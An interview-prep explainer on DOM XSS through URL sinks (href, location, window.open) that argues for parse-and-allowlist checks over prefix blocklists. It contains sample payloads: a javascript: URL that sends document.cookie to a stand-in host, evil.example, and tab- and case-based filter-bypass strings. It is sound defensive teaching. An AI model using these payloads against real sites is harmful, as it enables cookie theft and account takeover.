skip to content

A page takes a URL from an untrusted source and assigns it to an anchor's href or to location.href. Explain why that is an XSS sink in the browser, and what check actually makes it safe.

level: middleimportance: should knowfreq 45%

answer

  1. a scheme can be a program
  2. href is a sink too
  3. the parser is more forgiving than you
  4. tabs and case defeat prefix checks
  5. allowlist http: and https:

basics

~20 s

URL-bearing attributes accept the javascript: scheme, so an attacker-supplied URL becomes code running in your origin when the link is followed or the navigation happens. Parse the value with new URL() and allow only http: and https:; string prefix checks are bypassable.

solid answer

~40 s

Anywhere the browser will *navigate* or *fetch* using a string you supply is a sink: `a.href`, `location.href`, `location.assign()`, `window.open()`, `iframe.src`, `form.action`, `button.formaction`. The `javascript:` scheme is executable, so `a.href = untrusted` gives an attacker script execution in your origin the moment a user clicks. The correct guard is to parse, not to pattern-match: `new URL(value, document.baseURI)` and then allowlist `url.protocol` against `http:` and `https:`. Prefix checks like `value.startsWith("javascript:")` fail because the URL parser strips ASCII tab and newline characters and ignores leading whitespace, so `java\tscript:alert(1)` slips past and still executes; case variations do too. Parsing also catches the adjacent bug — a protocol-relative `//evil.com` is not XSS but is an open redirect.

code

javascript · 13 lines
javascript
function safeUrl(input) {
  let url;
  try {
    url = new URL(input, document.baseURI);
  } catch {
    return null; // not a URL at all
  }
  return (url.protocol === 'http:' || url.protocol === 'https:') ? url.href : null;
}

// The URL parser strips the tab, so a prefix check would have passed this through.
console.log(safeUrl('java\tscript:alert(1)')); // null
console.log(safeUrl('/docs/intro'));           // absolute https URL on this origin

go deeper

for a junior

Know that setting href, src or location from user-supplied data can execute a javascript: URL, and that the safe move is to check the scheme rather than trust the string.

for a middle

Explain why parsing with new URL() beats a prefix test: the parser strips tabs and newlines, ignores leading whitespace and treats schemes case-insensitively, so a blocklist is chasing someone else's normalisation rules.

for a senior

Demonstrate how you would centralise this into one fail-closed helper, decide per feature whether the check is scheme-only or origin-restricted, and separate the XSS finding from the open-redirect finding when triaging.

for a principal

Be ready to argue for URL handling as a typed boundary in the codebase rather than a convention — one construction point, fail-closed by default — and to weigh the product cost of refusing schemes that a partner integration genuinely wants.

## The sink is navigation, not markup The innerHTML family is only half of DOM XSS. The other half is any place the browser will *resolve and act on* a URL you built from data. The URL-bearing sinks include: - `a.href` and `area.href` - `location.href`, `location.assign()`, `location.replace()` - `window.open(url)` - `iframe.src`, `object.data`, `embed.src` - `form.action`, `button.formaction`, `input.formaction` - `script.src` — a different outcome (loading foreign code) but the same shape These are sinks because URLs carry a **scheme**, and one of the schemes the browser understands is executable. ## javascript: URLs A `javascript:` URL is not a location; it is a program. When the browser is asked to navigate to one, it evaluates the body in the **current document's realm and origin** and, if the result is a string, may replace the document with it. So `a.href = "javascript:fetch('//evil.example/'+document.cookie)"` is a stored XSS that fires on click. Nothing about the payload requires markup, so a sanitizer applied to your HTML strings does not see it, and a Content-Security-Policy that forbids inline script is what blocks it at the browser layer. ## Why string checks lose The classic guard is a prefix or substring test: ```js if (input.trim().toLowerCase().startsWith('javascript:')) return '#'; // not enough ``` The URL parser is more permissive than your string comparison: - ASCII **tab, LF and CR are removed** from the URL during parsing, so `java\tscript:alert(1)` and `java\nscript:alert(1)` normalise back to `javascript:`. - Leading and trailing C0 control characters and spaces are stripped, so a payload can start with a control character. - Schemes are **case-insensitive**, so `JaVaScRiPt:` is the same scheme. - Inside an HTML attribute, character references decode first, so `java	script:` reaches the parser as a tab. Each of these is a separate patch on a blocklist. That is the general reason a blocklist loses: you are re-implementing someone else's parser, and only their implementation decides what the string means. ## The check that works Parse with the browser's own parser and allowlist the result: ```js function safeUrl(input) { let url; try { url = new URL(input, document.baseURI); } catch { return null; } return (url.protocol === 'http:' || url.protocol === 'https:') ? url.href : null; } ``` Three properties make this sound. First, you compare against the parser's *normalised output*, so tabs, case and encodings are already resolved. Second, it is a positive list — a scheme nobody thought about fails closed. Third, resolving against a base turns a relative input into an absolute URL, which lets you also check `url.origin` when the requirement is "must stay on our site". ## data: and blob: URLs `data:text/html,...` was historically a way to get a document with markup you control. Modern browsers block **top-level navigation** to `data:` URLs (Chrome and Firefox since 2017–2018), and a document loaded from a `data:` URL has an **opaque origin**, so it cannot reach into the embedder. That removes the direct same-origin XSS but not the whole problem: `data:` and `blob:` are still credible as script sources and as phishing surfaces, and a `blob:` URL created by your own page carries *your* origin. Keep them out of the allowlist unless a specific feature needs them. ## The neighbouring bug Not every bad URL is XSS. `//evil.example/login` is protocol-relative: it navigates off-site with no script execution. That is an **open redirect** — lower severity, still a real finding because it lends your domain's credibility to a phishing page and can leak tokens carried in the URL. The same parse-and-check function handles it, by comparing `url.origin` against your own instead of only checking the scheme. ## Where to put the check At the sink, in one shared helper, and let it fail closed by returning `null` or `"#"` rather than the original string. Scattering ad-hoc validation at call sites reproduces the blocklist problem one file at a time, and a single helper is what a reviewer can actually verify.

  • Does a sanitizer like DOMPurify protect you here?
    For markup it sanitizes, yes — it drops `javascript:` values from `href` and `src`. But it only sees strings you pass through it. A direct `a.href = untrusted` or `location.href = untrusted` in your own JavaScript never reaches the sanitizer, so URL sinks need their own check at each assignment.
  • How is an open redirect different from this, and why does it still matter?
    An open redirect sends the user off-site without executing anything, so the attacker gains no access to your origin. It still matters: your domain lends credibility to a phishing landing page, and anything carried in the URL — a token in a query string, the Referer header — can leak to the destination. The fix is an origin allowlist, not a scheme allowlist.
  • Is window.open() safer than assigning location.href?
    No — `window.open(url)` accepts a `javascript:` URL just as readily, so it needs the same parse-and-allowlist guard. It adds a second concern: unless you pass `noopener`, the opened window gets a `window.opener` reference back to your page, which is a separate cross-window risk worth closing at the same call site.

saying these in an interview costs you the question

  • "Only innerHTML can cause XSS; href is just a string"
  • "Blocking strings that start with javascript: is enough"
  • "Encoding the URL before assigning it makes it safe"
  • "A relative URL can never be dangerous"
  • "encodeURIComponent on the whole URL fixes the scheme problem"

context